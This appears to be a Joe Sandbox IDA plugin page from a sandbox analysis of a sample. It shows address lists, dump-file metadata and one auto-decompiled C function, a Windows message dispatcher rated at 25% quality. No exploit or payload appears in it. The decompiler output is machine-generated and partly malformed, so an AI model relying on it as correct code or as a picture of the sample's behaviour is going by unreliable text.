0x00dead34
0x00dead37
0x00dead3a
0x00dead3e
0x00dead41
0x00dead43
0x00dead46
0x00000000
0x00000000
0x00dead48
0x00dead46
0x00dead23
0x00dead23
0x00dead26
0x00000000
0x00000000
0x00000000
0x00000000
0x00dead26
0x00dead4d
0x00dead4d
0x00000000
0x00dead4d
0x00dead4a
0x00000000
0x00dead4a
0x00dead05
0x00dead00
0x00dead50
0x00dead50
0x00dead52
0x00dead5c
0x00dead5c
0x00dead5f
0x00dead61
0x00dead63
0x00dead65
0x00dead6a
0x00dead6d
0x00dead6d
0x00dead70
0x00dead73
0x00dead76
0x00dead78
0x00dead8d
0x00dead8f
0x00dead91
0x00dead93
0x00dead95
0x00dead97
0x00dead99
0x00dead9b
0x00dead9e
0x00dead9e
0x00deada2
0x00deada4
0x00deadaa
0x00deadad
0x00deadad
0x00deadad
0x00deadb1
0x00deadb1
0x00deadb6
0x00deadb9
0x00deadb9
0x00deadbe
0x00deadc0
0x00deadc2
0x00deadc9
0x00deadc9
0x00deadcb
0x00deadd0
0x00deadd2
0x00deadd5
0x00deadd5
0x00deadd8
0x00deade0
0x00deade0
0x00deade2
0x00deade2
0x00deade7
0x00deaded
0x00deadf1
0x00deadf4
0x00deadf7
0x00deadf9
0x00deadf9
0x00deadf9
0x00deadfe
0x00deadfe
0x00deae01
0x00deae04
0x00deadc4
0x00deadc4
0x00deadc7
0x00000000
0x00000000
0x00deadc7
0x00deadc2
0x00deae0b
0x00deae0b
0x00deae0c
0x00dead54
0x00dead54
0x00dead56
0x00000000
0x00000000
0x00dead56
0x00deae0f
0x00deae1c
0x00deae1f
0x00deae22
0x00deae26
0x00deae27
0x00deae2a
0x00deae2d
0x00deae33
0x00deae34
0x00deae37
0x00deae3a
0x00deae3d
0x00deae3d
0x00deac32
0x00deae48
0x00deae4b
0x00deae4c
0x00deae4e
0x00deae50
0x00deae55
0x00deae60
0x00deae60
0x00deae66
0x00deae69
0x00deae6a
0x00deae6a
0x00deae60
0x00deae6e
0x00deae70
0x00deae72
0x00deae74
0x00deae74
0x00deae78
0x00000000
0x00000000
0x00deae7a
0x00deae7a
0x00deae7d
0x00deae7f
0x00000000
0x00000000
0x00000000
0x00deae7f
0x00deae74
0x00deae81
0x00deae8c
0x00deae8c
0x00deab9e
0x00deaa3c
0x00deaa3c
0x00deaa3c
0x00deaa3f
0x00deaa45
0x00deaa76
0x00deaa78
0x00deaaba
0x00deaabc
0x00deaac3
0x00deaaca
0x00deaacd
0x00deaad0
0x00deaad2
0x00deaad2
0x00deaad3
0x00deaad6
0x00deaae0
0x00deaaea
0x00deaaef
0x00deaaf2
0x00deaaf4
0x00deaaf7
0x00deab00
0x00deab03
0x00deab06
0x00deab09
0x00deab0f
0x00deab12
0x00deab15
0x00deab15
0x00deab15
0x00deab1a
0x00deab1a
0x00deab25
0x00deab30
0x00deab33
0x00deab3f
0x00deab44
0x00deab4f
0x00deab51
0x00deab53
0x00deab59
0x00deab5e
0x00deab60
0x00deab66
0x00deaa7a
0x00deaa85
0x00deaa88
0x00deaa94
0x00deaa96
0x00deaa9d
0x00deaa9f
0x00deaaa7
0x00deaaa9
0x00deaaab
0x00deaab0
0x00deaab3
0x00deaab9
0x00deaab9
0x00deaa47
0x00deaa55
0x00deaa61
0x00deaa63
0x00deaa75
0x00deaa75
0x00deaa45
0x00deaa36
0x00deaa25

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed42da2c41961fc7ef0cb96b7da98ae3225de842ce6c9ccaf2b4ebfc005237d8
Instruction ID: c92fc7c86cb3647c86f5c02479438694b27a8ad54b0738e35ba1bc54aec80440
Opcode Fuzzy Hash: ed42da2c41961fc7ef0cb96b7da98ae3225de842ce6c9ccaf2b4ebfc005237d8
Instruction Fuzzy Hash: BCF12D71E0025A9FDF14DFADC8806ADB7B1FF48314F298269E819AB344D731AD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB406F Relevance: 3.4, APIs: 2, Instructions: 402
COMMONCrypto

Download Yara Rule

C-Code - Quality: 25%

			E00CB406F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t206;
				signed int _t207;
				signed int _t214;
				intOrPtr _t215;
				unsigned int _t218;
				unsigned int _t225;
				signed int _t227;
				unsigned int _t229;
				unsigned int _t233;
				unsigned int _t235;
				signed int _t236;
				unsigned int _t245;
				unsigned int _t250;
				unsigned int _t254;
				unsigned int _t260;
				unsigned int _t261;
				unsigned int _t263;
				unsigned int _t272;
				unsigned int* _t278;
				unsigned int _t279;
				signed int* _t282;
				unsigned int _t291;
				intOrPtr _t300;
				unsigned int _t301;
				unsigned int _t302;
				intOrPtr _t306;
				unsigned int _t311;
				unsigned int _t313;
				signed int _t317;
				intOrPtr* _t319;
				void* _t324;
				void* _t329;

				_t329 = __fp0;
				_t270 = __ebx;
				_push(0xac);
				E00DDD52C(0xe088aa, __ebx, __edi, __esi);
				_t309 = __ecx;
				 *((intOrPtr*)(_t324 - 0x20)) = __ecx;
				 *(_t324 - 0x10) =  *(_t324 - 0x10) & 0x00000000;
				 *((intOrPtr*)(_t324 - 0x28)) = 0x7fffffff;
				 *(_t324 - 4) =  *(_t324 - 4) & 0x00000000;
				_t206 =  *(_t324 + 8);
				if(_t206 != 0x111) {
					_t272 =  *(_t324 + 0x10);
					_t300 =  *((intOrPtr*)(_t324 + 0xc));
					__eflags = _t206 - 1;
					if(_t206 != 1) {
						__eflags = _t206 - 0x4e;
						if(_t206 != 0x4e) {
							__eflags = _t206 - 6;
							if(_t206 != 6) {
								__eflags = _t206 - 0x20;
								if(_t206 != 0x20) {
									L19:
									_t311 =  *(_t309 + 0x70);
									 *(_t324 - 0x14) = _t311;
									__eflags = _t311;
									if(_t311 == 0) {
										L27:
										_t207 =  *(_t324 + 8);
										__eflags = _t207 - 5;
										if(_t207 == 5) {
											 *0xe17a64();
											 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 0x148))))();
											_t313 = E00CB2A8A(_t309);
											__eflags = _t313;
											if(_t313 != 0) {
												__eflags =  *(_t313 + 4);
												if( *(_t313 + 4) != 0) {
													__eflags =  *(_t324 + 0x10) >> 0x10;
													E00CBB6D0(_t313, E00CBB1C0(_t324 - 0x18,  *(_t324 + 0x10) & 0x0000ffff,  *(_t324 + 0x10) >> 0x10));
													RedrawWindow( *(_t309 + 0x20), 0, 0, 0x105);
												}
											}
											L38:
											 *0xe17a64();
											_t214 =  *((intOrPtr*)( *((intOrPtr*)( *_t309 + 0x28))))();
											 *(_t324 - 0x24) = _t214;
											_t215 = 7;
											_t317 = (_t214 ^  *(_t324 + 8)) & 0x000001ff;
											 *((intOrPtr*)(_t324 - 0x28)) = _t215;
											E00CB7DC9(_t309, _t309, _t317, _t215);
											_t278 =  *(_t324 - 0x24);
											_t318 =  *(_t324 + 8);
											_t218 = 0xe852a0 + _t317 * 0xc;
											 *(_t324 - 0x14) = _t218;
											__eflags = _t318 -  *_t218;
											if(_t318 !=  *_t218) {
												L43:
												_t301 = 0;
												 *_t218 = _t318;
												 *(_t218 + 8) = _t278;
												__eflags =  *_t278;
												if( *_t278 == 0) {
													L139:
													 *(_t218 + 4) = _t301;
													E00CB7E3D(_t278, 7);
													L140:
													_t302 = 0;
													__eflags = 0;
													L141:
													return E00DDD4FA(_t302);
												} else {
													goto L44;
												}
												while(1) {
													L44:
													_push(_t301);
													_push(_t301);
													__eflags = _t318 - 0xc000;
													if(_t318 >= 0xc000) {
														goto L49;
													}
													_push(_t318);
													_t57 =  &(_t278[1]); // 0x51c9330c
													_push( *_t57);
													_t233 = E00CB1032();
													 *(_t324 - 0x1c) = _t233;
													__eflags = _t233;
													if(_t233 == 0) {
														L53:
														 *0xe17a64();
														_t278 =  *((intOrPtr*)( *( *(_t324 - 0x24))))();
														_t301 = 0;
														 *(_t324 - 0x24) = _t278;
														__eflags =  *_t278;
														if( *_t278 == 0) {
															_t218 =  *(_t324 - 0x14);
															goto L139;
														}
														_t318 =  *(_t324 + 8);
														continue;
													}
													 *( *(_t324 - 0x14) + 4) = _t233;
													E00CB7E3D(_t278, 7);
													_t235 =  *(_t324 - 0x1c);
													 *((intOrPtr*)(_t324 - 0x28)) = 0x7fffffff;
													L47:
													_t306 =  *((intOrPtr*)(_t235 + 0x10));
													_t318 =  *(_t235 + 0x14);
													 *(_t324 - 0x14) =  *(_t235 + 0x14);
													_t66 = _t306 - 1; // -1
													_t236 = _t66;
													__eflags = _t236 - 0x5d;
													if(__eflags > 0) {
														L66:
														_t227 =  *(_t324 - 0x10);
														L135:
														_t302 = 1;
														__eflags = 1;
														L136:
														_t282 =  *(_t324 + 0x14);
														if(_t282 != 0) {
															 *_t282 = _t227;
														}
														goto L141;
													}
													switch( *((intOrPtr*)(_t236 * 4 +  &M00CB48AF))) {
														case 0:
															_push(E00CB9E13(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
															goto L57;
														case 1:
															_push( *(__ebp + 0xc));
															goto L57;
														case 2:
															__ecx =  *(__ebp + 0x10);
															__eax = __ecx;
															__eax = __ecx >> 0x10;
															__eflags = __eax;
															_push(__eax);
															__eax = __cx & 0x0000ffff;
															_push(__cx & 0x0000ffff);
															__eax = E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0xc));
															goto L68;
														case 3:
															_push( *(__ebp + 0x10));
															__eax = E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0xc));
															goto L59;
														case 4:
															_push( *(__ebp + 0x10));
															L57:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															goto L135;
														case 5:
															__ecx = __ebp - 0x38;
															E00CB9032(__ebp - 0x38) =  *(__ebp + 0x10);
															__ecx = __ebp - 0xb8;
															 *((char*)(__ebp - 4)) = 5;
															__eax =  *( *(__ebp + 0x10) + 4);
															 *(__ebp - 0x34) =  *( *(__ebp + 0x10) + 4);
															__eax = E00CB0725(__ebp - 0xb8, __eflags, 0);
															 *(__ebp - 0xb8) = 0xe187f8;
															__ecx =  *(__ebp + 0x10);
															 *((char*)(__ebp - 4)) = 6;
															__eax =  *__ecx;
															__ecx =  *(__ecx + 8);
															 *(__ebp - 0x98) = __eax;
															 *(__ebp - 0x14) = __ecx;
															__eax = E00CB27A9(__ecx, __edi, __eflags, __eax);
															__eflags = __eax;
															if(__eax == 0) {
																__ecx =  *(__edi + 0x70);
																__eflags = __ecx;
																if(__ecx != 0) {
																	_push( *(__ebp - 0x98));
																	__eax = E00CAF874(__ebx, __ecx, __edx);
																	__eflags = __eax;
																	if(__eax != 0) {
																		 *(__ebp - 0x44) = __eax;
																	}
																}
																__eax = __ebp - 0xb8;
															}
															_push( *(__ebp - 0x14));
															__ecx = __esi;
															_push(__eax);
															__eax = __ebp - 0x38;
															_push(__ebp - 0x38);
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															 *(__ebp - 0x34) =  *(__ebp - 0x34) & 0x00000000;
															__ecx = __ebp - 0xb8;
															_t111 = __ebp - 0x98;
															 *_t111 =  *(__ebp - 0x98) & 0x00000000;
															__eflags =  *_t111;
															 *(__ebp - 0x10) = __ebp - 0x38;
															__eax = E00CB09A9(__ebp - 0xb8);
															goto L77;
														case 6:
															__ecx = __ebp - 0x38;
															__eax = E00CB9032(__ebp - 0x38);
															__ecx =  *(__ebp + 0x10);
															 *((char*)(__ebp - 4)) = 7;
															__eax =  *(__ecx + 4);
															_push( *(__ecx + 8));
															 *(__ebp - 0x34) =  *(__ecx + 4);
															__ecx = __esi;
															__eax = __ebp - 0x38;
															_push(__ebp - 0x38);
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															 *(__ebp - 0x34) =  *(__ebp - 0x34) & 0x00000000;
															 *(__ebp - 0x10) = __ebp - 0x38;
															L77:
															__ecx = __ebp - 0x38;
															__eax = E00CB91A4(__ebp - 0x38);
															goto L66;
														case 7:
															 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															_push(E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0x10)));
															__eax =  *(__ebp + 0xc);
															__eax = __ax & 0x0000ffff;
															goto L68;
														case 8:
															__ecx =  *(__ebp + 0xc);
															 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															__eax = __cx & 0x0000ffff;
															goto L59;
														case 9:
															L132:
															_push( *(_t324 + 0x10));
															goto L133;
														case 0xa:
															__eax = E00CBAF23(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0x10));
															__ecx =  *(__ebp + 0xc);
															_push(__eax);
															 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															__eax = __cx & 0x0000ffff;
															L68:
															_push(__eax);
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															goto L135;
														case 0xb:
															_push( *(__ebp + 0x10));
															goto L64;
														case 0xc:
															_push( *(__ebp + 0xc));
															goto L86;
														case 0xd:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															goto L66;
														case 0xe:
															__ecx =  *(__ebp + 0xc);
															 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															__eax = __cx & 0x0000ffff;
															goto L82;
														case 0xf:
															__ecx =  *(__ebp + 0x10);
															__eax =  *(__ebp + 0x10);
															__eax =  *(__ebp + 0x10) >> 0x10;
															__ax = __eax;
															_push(__eax);
															__eax = __cx;
															goto L82;
														case 0x10:
															__ecx =  *(__ebp + 0x10);
															__eax =  *(__ebp + 0x10);
															__eax =  *(__ebp + 0x10) >> 0x10;
															__eflags = __eax;
															_push(__eax);
															__eax = __cx & 0x0000ffff;
															_push(__cx & 0x0000ffff);
															goto L91;
														case 0x11:
															__eax = E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0x10));
															goto L63;
														case 0x12:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															goto L135;
														case 0x13:
															__edi = E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0xc));
															__eax = E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0x10));
															__edx =  *(__ebp - 0x20);
															__ecx = 0;
															__esi =  *(__ebp + 0x10);
															_push(__edi);
															_push(__eax);
															__eflags =  *((intOrPtr*)(__edx + 0x20)) -  *(__ebp + 0x10);
															__esi =  *(__ebp - 0x14);
															_t146 =  *((intOrPtr*)(__edx + 0x20)) ==  *(__ebp + 0x10);
															__eflags = _t146;
															__ecx = 0 | _t146;
															_push(_t146);
															goto L95;
														case 0x14:
															__eax = E00CB9E13(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
															goto L98;
														case 0x15:
															__eax = E00CBAF23(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
															goto L98;
														case 0x16:
															__ecx =  *(__ebp + 0x10);
															__eax = __ecx;
															__eax = __ecx >> 0x10;
															__eflags = __eax;
															__ax = __eax;
															_push(__eax);
															__eax = __cx;
															_push(__cx);
															__eax = E00CBAF23(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
															goto L101;
														case 0x17:
															_push( *(__ebp + 0xc));
															goto L103;
														case 0x18:
															_push( *(__ebp + 0x10));
															L103:
															__eax = E00CB277F(__ebx, __ecx, __edx);
															L98:
															_push(__eax);
															goto L86;
														case 0x19:
															__ecx =  *(__ebp + 0x10);
															__ecx = __ecx >> 0x10;
															_push(__ecx >> 0x10);
															__eax = __cx & 0x0000ffff;
															_push(__cx & 0x0000ffff);
															__eax = E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0xc));
															goto L101;
														case 0x1a:
															__ecx =  *(__ebp + 0x10);
															__eax = __cx;
															__ecx =  *(__ebp + 0x10) >> 0x10;
															 *(__ebp - 0x14) = __cx;
															__edi = __cx;
															__eax = E00CB277F(__ebx,  *(__ebp + 0x10) >> 0x10, __edx,  *(__ebp + 0xc));
															_push(__cx);
															_push( *(__ebp - 0x14));
															_push(__eax);
															L95:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx =  *(__ebp - 0x20);
															goto L93;
														case 0x1b:
															_push( *(__ebp + 0x10));
															__eax = E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0xc));
															goto L82;
														case 0x1c:
															 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															_push(E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0x10)));
															__eax =  *(__ebp + 0xc);
															__eax = __ax & 0x0000ffff;
															goto L101;
														case 0x1d:
															__eax =  *(__ebp + 0xc);
															__ecx = __ax;
															__eax =  *(__ebp + 0xc) >> 0x10;
															__ax = __eax;
															 *(__ebp - 0x20) = __ecx;
															 *(__ebp - 0x14) = __eax;
															__eflags = __edx - 0x2b;
															if(__edx != 0x2b) {
																_push(__eax);
																_push(__ecx);
																goto L65;
															}
															_push(E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0x10)));
															_push( *(__ebp - 0x14));
															_push( *(__ebp - 0x20));
															goto L92;
														case 0x1e:
															_push( *(__ebp + 0x10));
															L86:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															goto L66;
														case 0x1f:
															_push( *(__ebp + 0x10));
															__ecx = __esi;
															_push( *(__ebp + 0xc));
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															goto L34;
														case 0x20:
															__eax =  *(__ebp + 0x10);
															__ecx = __ax;
															__eax =  *(__ebp + 0x10) >> 0x10;
															__ax = __eax;
															_push(__eax);
															_push(__ecx);
															goto L134;
														case 0x21:
															__ecx =  *(__ebp + 0xc);
															__eax =  *(__ebp + 0xc);
															_push( *(__ebp + 0x10));
															__eax =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															__eax = __cx & 0x0000ffff;
															L101:
															_push(__eax);
															goto L92;
														case 0x22:
															__eax =  *(__ebp + 0x10);
															__ecx = __ax;
															__eax =  *(__ebp + 0x10) >> 0x10;
															__ax = __eax;
															_push(__eax);
															_push(__ecx);
															L91:
															_push( *(__ebp + 0xc));
															L92:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															L93:
															__eax =  *__esi();
															goto L66;
														case 0x23:
															__eax =  *(__ebp + 0x10);
															__ecx = __ax;
															__eax =  *(__ebp + 0x10) >> 0x10;
															__ax = __eax;
															_push(__eax);
															_push(__ecx);
															__ecx =  *(__ebp + 0xc);
															 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															__eax = __cx & 0x0000ffff;
															__ecx = __esi;
															_push(__cx & 0x0000ffff);
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															__eflags = __eax;
															if(__eax == 0) {
																goto L140;
															}
															goto L135;
														case 0x24:
															__eax =  *(__ebp + 0x10);
															__ecx = __ax;
															__eax =  *(__ebp + 0x10) >> 0x10;
															__ax = __eax;
															_push(__eax);
															_push(__ecx);
															__ecx =  *(__ebp + 0xc);
															 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															__eax = __cx & 0x0000ffff;
															__ecx = __esi;
															_push(__cx & 0x0000ffff);
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															goto L66;
														case 0x25:
															goto L66;
														case 0x26:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															__eflags = __eax;
															if(__eax != 0) {
																goto L140;
															}
															goto L135;
														case 0x27:
															__eax = E00CBAF23(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0x10));
															L63:
															_push(__eax);
															L64:
															_push( *(__ebp + 0xc));
															goto L65;
														case 0x28:
															__eax = E00CBAF23(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0x10));
															_push(__eax);
															L133:
															_push( *((intOrPtr*)(_t324 + 0xc)));
															goto L134;
														case 0x29:
															_push( *(__ebp + 0x10));
															__eax = E00CBAF23(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
															goto L82;
														case 0x2a:
															__eax =  *(__ebp + 0x10);
															__ecx =  *(__ebp + 0x10);
															__eax = __ax & 0x0000ffff;
															_push(__ax & 0x0000ffff);
															__ecx =  *(__ebp + 0x10) >> 0x10;
															__eax = __ecx;
															__ecx = __ecx & 0x00000fff;
															__eax = __eax & 0x0000f000;
															__eflags = __eax;
															_push(__eax);
															_push(__ecx);
															__eax = E00CB277F(__ebx, __ecx, __edx,  *(__ebp + 0xc));
															goto L124;
														case 0x2b:
															__eax =  *(__ebp + 0xc);
															_push( *(__ebp + 0x10));
															__eax = __al & 0x000000ff;
															goto L82;
														case 0x2c:
															__eax =  *(__ebp + 0x10);
															__ecx = __ax;
															__eax =  *(__ebp + 0x10) >> 0x10;
															__ax = __eax;
															_push(__eax);
															_push(__ecx);
															__ecx =  *(__ebp + 0xc);
															 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
															_push( *(__ebp + 0xc) >> 0x10);
															__eax = __cx & 0x0000ffff;
															L124:
															_push(__eax);
															goto L125;
														case 0x2d:
															__eax =  *(__ebp + 0x10);
															__ecx = __ax;
															__eax =  *(__ebp + 0x10) >> 0x10;
															__ax = __eax;
															_push(__eax);
															_push(__ecx);
															__ecx =  *(__ebp + 0xc);
															__ecx = __ecx >> 0x10;
															_push(__ecx >> 0x10);
															_push(__ecx);
															L125:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															L34:
															_t302 = 1;
															_t227 = 1;
															goto L136;
														case 0x2e:
															_push( *(__ebp + 0x10));
															__eax = E00CB9E13(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
															goto L59;
														case 0x2f:
															 *(__ebp + 0x10) = __ax & 0x0000ffff;
															_push(__ax & 0x0000ffff);
															__eax = E00CB9E25(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
															L82:
															_push(__eax);
															L65:
															__ecx = __esi;
															__eax =  *0xe17a64();
															__ecx = __edi;
															__eax =  *__esi();
															goto L66;
														case 0x30:
															__ecx =  *(__ebp + 0x10);
															__eax = __cx;
															__ecx =  *(__ebp + 0x10) >> 0x10;
															_push(__cx);
															__eax = __cx;
															L59:
															_push(__eax);
															L134:
															 *0xe17a64();
															_t227 =  *_t319();
															goto L135;
													}
													L49:
													_push(0xc000);
													_t69 =  &(_t278[1]); // 0x51c9330c
													_push( *_t69);
													_t279 = E00CB1032();
													 *(_t324 - 0x1c) = _t279;
													while(1) {
														__eflags = _t279;
														if(_t279 == 0) {
															goto L53;
														}
														__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x10)))) - _t318;
														if( *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x10)))) == _t318) {
															 *( *(_t324 - 0x14) + 4) = _t279;
															E00CB7E3D(_t279, 7);
															_t225 =  *(_t324 - 0x1c);
															 *((intOrPtr*)(_t324 - 0x28)) = 0x7fffffff;
															L131:
															_t319 =  *((intOrPtr*)(_t225 + 0x14));
															goto L132;
														}
														_t72 = _t279 + 0x18; // 0x18
														_t229 = E00CB1032(_t72, 0xc000, 0, 0);
														_t279 = _t229;
														 *(_t324 - 0x1c) = _t229;
													}
													goto L53;
												}
											}
											__eflags = _t278 -  *(_t218 + 8);
											if(_t278 !=  *(_t218 + 8)) {
												goto L43;
											}
											 *(_t324 - 0x1c) =  *(_t218 + 4);
											E00CB7E3D(_t278, 7);
											_t235 =  *(_t324 - 0x1c);
											 *((intOrPtr*)(_t324 - 0x28)) = 0x7fffffff;
											__eflags = _t235;
											if(_t235 == 0) {
												goto L140;
											}
											__eflags = _t318 - 0xc000;
											if(_t318 < 0xc000) {
												goto L47;
											}
											goto L131;
										}
										__eflags = _t207 - 0xf;
										if(__eflags == 0) {
											__eflags = E00CB245D(_t270, _t309, _t300, _t309, _t311, __eflags, _t329);
											L33:
											if(__eflags == 0) {
												goto L38;
											}
											goto L34;
										}
										__eflags = _t207 - 0x14;
										if(_t207 != 0x14) {
											goto L38;
										}
										_t245 =  *(_t309 + 0x7c);
										__eflags = _t245;
										if(_t245 == 0) {
											goto L38;
										}
										__eflags =  *(_t245 + 4);
										goto L33;
									}
									__eflags =  *(_t311 + 0x74);
									if( *(_t311 + 0x74) <= 0) {
										goto L27;
									}
									__eflags = _t206 - 0x200;
									if(_t206 < 0x200) {
										L23:
										__eflags = _t206 - 0x100;
										if(_t206 < 0x100) {
											L25:
											__eflags = _t206 + 0xfffffd7f - 0x10;
											if(_t206 + 0xfffffd7f > 0x10) {
												goto L27;
											}
											L26:
											_t311 =  *( *_t311 + 0x94);
											 *0xe17a64( *(_t324 + 8), _t300, _t272, _t324 - 0x10);
											_t250 =  *_t311();
											__eflags = _t250;
											if(_t250 != 0) {
												goto L66;
											}
											goto L27;
										}
										__eflags = _t206 - 0x10f;
										if(_t206 <= 0x10f) {
											goto L26;
										}
										goto L25;
									}
									__eflags = _t206 - 0x209;
									if(_t206 <= 0x209) {
										goto L26;
									}
									goto L23;
								}
								_t254 = E00CB5E6F(__ebx, _t300, __ecx, __ecx, _t272, _t272 >> 0x10);
								__eflags = _t254;
								if(_t254 != 0) {
									goto L34;
								}
								L18:
								_t206 =  *(_t324 + 8);
								_t300 =  *((intOrPtr*)(_t324 + 0xc));
								_t272 =  *(_t324 + 0x10);
								goto L19;
							}
							E00CB5DFA(_t272, _t300, _t309,  *((intOrPtr*)(_t324 + 0xc)), E00CB277F(__ebx, _t272, _t300, _t272));
							goto L18;
						}
						_t291 =  *(_t324 + 0x10);
						__eflags =  *_t291;
						if( *_t291 == 0) {
							goto L140;
						}
						 *0xe17a64( *((intOrPtr*)(_t324 + 0xc)), _t291, _t324 - 0x10);
						_t260 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xf8))))();
						__eflags = _t260;
						if(_t260 != 0) {
							goto L66;
						}
						goto L140;
					}
					__eflags =  *(__ecx + 0x58);
					if( *(__ecx + 0x58) == 0) {
						goto L19;
					} else {
						_t261 = E00CBC4BC( *(__ecx + 0x58), __ecx);
						__eflags = _t261;
						if(_t261 != 0) {
							E00CB2F0E(__ecx);
						} else {
							_t263 =  *(__ecx + 0x58);
							 *(_t324 - 0x14) = _t263;
							__eflags = _t263;
							if(_t263 != 0) {
								 *0xe17a64(1);
								 *((intOrPtr*)( *((intOrPtr*)( *_t263 + 4))))();
							}
							 *(_t309 + 0x58) =  *(_t309 + 0x58) & 0x00000000;
						}
						goto L18;
					}
				}
				 *0xe17a64( *((intOrPtr*)(_t324 + 0xc)),  *(_t324 + 0x10));
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xf4))))() == 0) {
					goto L140;
				} else {
					goto L34;
				}
			}

0x00cb406f
0x00cb406f
0x00cb406f
0x00cb4079
0x00cb407e
0x00cb4080
0x00cb4083
0x00cb4087
0x00cb408e
0x00cb4092
0x00cb409a
0x00cb40c3
0x00cb40c6
0x00cb40c9
0x00cb40cc
0x00cb4112
0x00cb4115
0x00cb414c
0x00cb414f
0x00cb4163
0x00cb4166
0x00cb4189
0x00cb4189
0x00cb418c
0x00cb418f
0x00cb4191
0x00cb41e5
0x00cb41e5
0x00cb41e8
0x00cb41eb
0x00cb4223
0x00cb422b
0x00cb4234
0x00cb4236
0x00cb4238
0x00cb423a
0x00cb423e
0x00cb4245
0x00cb4258
0x00cb4269
0x00cb4269
0x00cb423e
0x00cb426f
0x00cb4276
0x00cb427e
0x00cb4284
0x00cb428a
0x00cb428c
0x00cb4292
0x00cb4295
0x00cb429a
0x00cb42a0
0x00cb42a3
0x00cb42a8
0x00cb42ab
0x00cb42ad
0x00cb42e0
0x00cb42e0
0x00cb42e2
0x00cb42e4
0x00cb42e7
0x00cb42e9
0x00cb4896
0x00cb4898
0x00cb489b
0x00cb48a0
0x00cb48a0
0x00cb48a0
0x00cb48a2
0x00cb48a9
0x00000000
0x00000000
0x00000000
0x00cb42ef
0x00cb42ef
0x00cb42ef
0x00cb42f0
0x00cb42f1
0x00cb42f7
0x00000000
0x00000000
0x00cb42f9
0x00cb42fa
0x00cb42fa
0x00cb42fd
0x00cb4302
0x00cb4305
0x00cb4307
0x00cb4376
0x00cb437d
0x00cb4385
0x00cb4387
0x00cb4389
0x00cb438c
0x00cb438e
0x00cb4893
0x00000000
0x00cb4893
0x00cb4394
